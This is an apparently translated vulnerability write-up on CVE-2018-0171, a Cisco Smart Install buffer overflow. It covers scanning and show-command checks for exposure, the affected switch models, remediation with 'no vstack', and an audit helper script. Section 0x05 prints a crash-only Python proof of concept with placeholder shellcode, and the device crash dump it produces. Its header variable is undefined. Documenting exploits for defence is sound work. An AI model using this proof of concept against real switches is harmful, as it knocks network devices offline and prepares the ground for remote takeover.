Cisco Smart Install Remote Command Execution Vulnerability

0x01 Introduction

A stack-based buffer overflow was found in the Smart Install Client code; an attacker can exploit it to execute arbitrary code remotely without authenticating, and so take complete control of a vulnerable network device. Cisco Smart Install is a plug-and-play configuration and image-management feature that makes deploying new switches simple: a Cisco switch can be placed anywhere, connected to the network and powered on with no further configuration. It automates the initial configuration process and provisions new switches with the currently loaded operating-system image, and it also provides a real-time backup whenever the configuration changes. Note that the feature is enabled by default on the client.

     

0x02 Vulnerability Description

A stack buffer overflow (CVE-2018-0171) exists in the Smart Install Client code of Cisco IOS and IOS XE. An attacker can remotely send a crafted packet to TCP port 4786 to trigger the overflow on the target device, causing either a denial of service (DoS) or remote command execution, after which the attacker controls the affected network device. TCP port 4786 is reportedly open by default on Cisco switches.

0x03 Checking for the Vulnerability

1. If a Cisco network device has TCP port 4786 open, it is potentially vulnerable. To find such devices, scan the target network with nmap:

    nmap -p T:4786 192.168.1.0/24

2. To check whether the Smart Install Client feature is enabled on a device, run show vstack config. The following examples show its output on Cisco Catalyst switches configured as Smart Install clients:

    switch1# show vstack config
     Role: Client (SmartInstall enabled)
     .
    switch2# show vstack config
     Capability: Client
     Oper Mode: Enabled
     Role: Client

In the show vstack config output, "Role: Client (SmartInstall enabled)" on the first switch, and "Oper Mode: Enabled" together with "Role: Client" on the second, confirm that the feature is enabled on the device.

3. Run the following command on the Cisco device; if port 4786 is listening, SMI is in use:

    switch>show tcp brief all
    TCB       Local Address           Foreign Address        (state)
    0344B794  *.4786                  *.*                    LISTEN
    0350A018  *.443                   *.*                    LISTEN
    03293634  *.443                   *.*                    LISTEN
    03292D9C  *.80                    *.*                    LISTEN
    03292504  *.80                    *.*                    LISTEN

Cisco IOS / IOS XE software version check:

    Router> show version
    Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2015 by Cisco Systems, Inc.
    Compiled Mon 22-Jun-15 09:32 by prod_rel_team

    ios-xe-device# show version
    Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2016 by Cisco Systems, Inc.
    Compiled Sun 27-Mar-16 21:47 by mcpre

4. If you are not sure whether your software release is affected, use the Cisco IOS Software Checker:
    https://tools.cisco.com/security/center/softwarechecker.x

5. Use the script below to confirm that the service open on a given IP and port really is the Cisco SMI protocol:

    https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

The protocol fingerprint it relies on can be seen in the Metasploit commit that added the SMI scanner:

    https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d

    # python smi_check.py -i targetip
    [INFO] Sending TCP probe to targetip:4786
    [INFO] Smart Install Client feature active on targetip:4786
    [INFO] targetip is affected

     

0x04 Affected Scope

    Affected devices:
    Catalyst 4500 Supervisor Engines
    Cisco Catalyst 3850 Series Switches
    Cisco Catalyst 2960 Series Switches

Devices that include part of the Smart Install Client functionality may also be affected:
    Catalyst 4500 Supervisor Engines
    Catalyst 3850 Series
    Catalyst 3750 Series
    Catalyst 3650 Series
    Catalyst 3560 Series
    Catalyst 2960 Series
    Catalyst 2975 Series
    IE 2000
    IE 3000
    IE 3010
    IE 4000
    IE 4010
    IE 5000
    SM-ES2 SKUs
    SM-ES3 SKUs
    NME-16ES-1G-P
    SM-X-ES3 SKUs

     

     

0x05 Vulnerability Verification

    The following is the PoC used to verify this vulnerability:

    # smi_ibc_init_discovery_BoF.py
    # Python 2 script (print statements, str payloads), reproduced from the write-up.
    import socket
    import struct
    from optparse import OptionParser

    # Parse the target options
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
    parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
    (options, args) = parser.parse_args()

    def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
        # Type-length-value: 4-byte type, 4-byte length, then the value bytes
        return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v

    def send_packet(sock, packet):
        sock.send(packet)

    def receive(sock):
        # recv() requires a buffer size; the original listing omitted it
        return sock.recv(4096)

    if __name__ == "__main__":
        print "[*] Connecting to Smart Install Client ", options.target, "port", options.port

        con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        con.connect((options.target, options.port))

        payload = 'BBBB' * 44
        shellcode = 'D' * 2048

        data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload

        tlv_1 = craft_tlv(0x00000001, data)
        tlv_2 = shellcode

        # NOTE: hdr (the Smart Install message header) is not defined anywhere in
        # this listing as reproduced in the write-up.
        pkt = hdr + tlv_1 + tlv_2

        print "[*] Send a malicious packet"
        send_packet(con, pkt)

     

To attack the switch, run the following command:

    host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1

The switch should then print crash information and reboot:

     

    00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPU vector 1200, PC = 42424240
    -Traceback= 42424240
    Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
    === Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:
    ...
    Queued messages:
    Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2016 by Cisco Systems, Inc.
    Compiled Wed 17-Aug-16 13:46 by prod_rel_team
    Instruction TLB Miss Exception (0x1200)!
    SRR0 = 0x42424240  SRR1 = 0x00029230  SRR2 = 0x0152ACE4  SRR3 = 0x00029230
    ESR = 0x00000000  DEAR = 0x00000000  TSR = 0x84000000  DBSR = 0x00000000
    CPU Register Context:
    Vector = 0x00001200  PC = 0x42424240  MSR = 0x00029230  CR = 0x33000053
    LR = 0x42424242  CTR = 0x014D5268  XER = 0xC000006A
    R0 = 0x42424242  R1 = 0x02B1B0B0  R2 = 0x00000000  R3 = 0x032D12B4
    R4 = 0x000000B6  R5 = 0x0000001E  R6 = 0xAA3BEC00  R7 = 0x00000014
    R8 = 0x0000001E  R9 = 0x00000000  R10 = 0x001BA800  R11 = 0xFFFFFFFF
    R12 = 0x00000000  R13 = 0x00110000  R14 = 0x0131E1A8  R15 = 0x02B1B1A8
    R16 = 0x02B1B128  R17 = 0x00000000  R18 = 0x00000000  R19 = 0x02B1B128
    R20 = 0x02B1B128  R21 = 0x00000001  R22 = 0x02B1B128  R23 = 0x02B1B1A8
    R24 = 0x00000001  R25 = 0x00000000  R26 = 0x42424242  R27 = 0x42424242
    R28 = 0x42424242  R29 = 0x42424242  R30 = 0x42424242  R31 = 0x42424242
    Stack trace:
    PC = 0x42424240, SP = 0x02B1B0B0
    Frame 00: SP = 0x42424242    PC = 0x42424242

     

     

0x06 Remediation

    #conf t

    Enter configuration commands, one per line.  End with CNTL/Z.

    NSJ-131-6-16-C2960_7(config)#no vstack 

    NSJ-131-6-16-C2960_7(config)#exit

The key command is no vstack, which disables the Smart Install client.

     

Checking again, port 4786 is no longer listening:

    #show tcp brief all 

    TCB       Local Address           Foreign Address        (state)

    075A0088  *.443                   *.*                    LISTEN

    0759F6C8  *.443                   *.*                    LISTEN

    0759ED08  *.80                    *.*                    LISTEN

    0759E348  *.80                    *.*                    LISTEN
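As an added example (not code from the original post or from Cisco), the two checks from 0x03 and the post-fix verification above can be run over saved CLI output instead of by eye. The sample outputs below are constructed after this post's own show tcp brief all and show vstack config excerpts; the "Oper Mode: Disabled" text used in the lead-in of the test is an assumed form, not a captured one.

```python
import re

# Constructed sample CLI output, modelled on the show tcp brief all and
# show vstack config excerpts in this write-up (not captures from a live device).
TCP_BRIEF_BEFORE_FIX = """\
TCB       Local Address           Foreign Address        (state)
0344B794  *.4786                  *.*                    LISTEN
0350A018  *.443                   *.*                    LISTEN
03292D9C  *.80                    *.*                    LISTEN
"""
TCP_BRIEF_AFTER_FIX = """\
TCB       Local Address           Foreign Address        (state)
075A0088  *.443                   *.*                    LISTEN
0759ED08  *.80                    *.*                    LISTEN
"""
VSTACK_LONG_FORM = " Capability: Client\n Oper Mode: Enabled\n Role: Client\n"
VSTACK_SHORT_FORM = " Role: Client (SmartInstall enabled)\n"

SMI_PORT = 4786

# One socket row: <TCB hex> <host>.<port> <foreign> <state>. The header row
# starts with "TCB", which is not hex, so it never matches.
_TCP_ROW = re.compile(r"^\s*[0-9A-Fa-f]+\s+(\S+)\.(\d+)\s+\S+\s+(\S+)\s*$")


def smi_listeners(tcp_brief):
    """Return (local_host, state) for every socket bound to TCP 4786."""
    hits = []
    for line in tcp_brief.splitlines():
        m = _TCP_ROW.match(line)
        if m and int(m.group(2)) == SMI_PORT:
            hits.append((m.group(1), m.group(3)))
    return hits


def vstack_client_enabled(vstack):
    """True when show vstack config reports an enabled client, in either style."""
    text = vstack.lower()
    if "role: client" not in text:
        return False
    return "smartinstall enabled" in text or "oper mode: enabled" in text


def assess(tcp_brief, vstack):
    """Single verdict for an audit report: both indicators must clear."""
    listening = any(st == "LISTEN" for _, st in smi_listeners(tcp_brief))
    client_on = vstack_client_enabled(vstack)
    if listening and client_on:
        return "exposed"        # apply 'no vstack' and re-check
    if listening or client_on:
        return "inconsistent"   # one indicator only: re-check the device
    return "mitigated"
```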

     

     

0x07 Impact

    An attacker can trigger a buffer overflow on an affected device, which may have the following effects:

    Trigger a reload of the device

    Allow the attacker to execute arbitrary code on the device

    Put the affected device into an endless reboot loop, crashing the device

     


     

0x08 References

    https://embedi.com/blog/cisco-smart-install-remote-code-execution/

    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2

    https://www.anquanke.com/post/id/103122

    https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w

    https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99

    https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be

Original source: https://www.cnblogs.com/backlion/p/8675854.html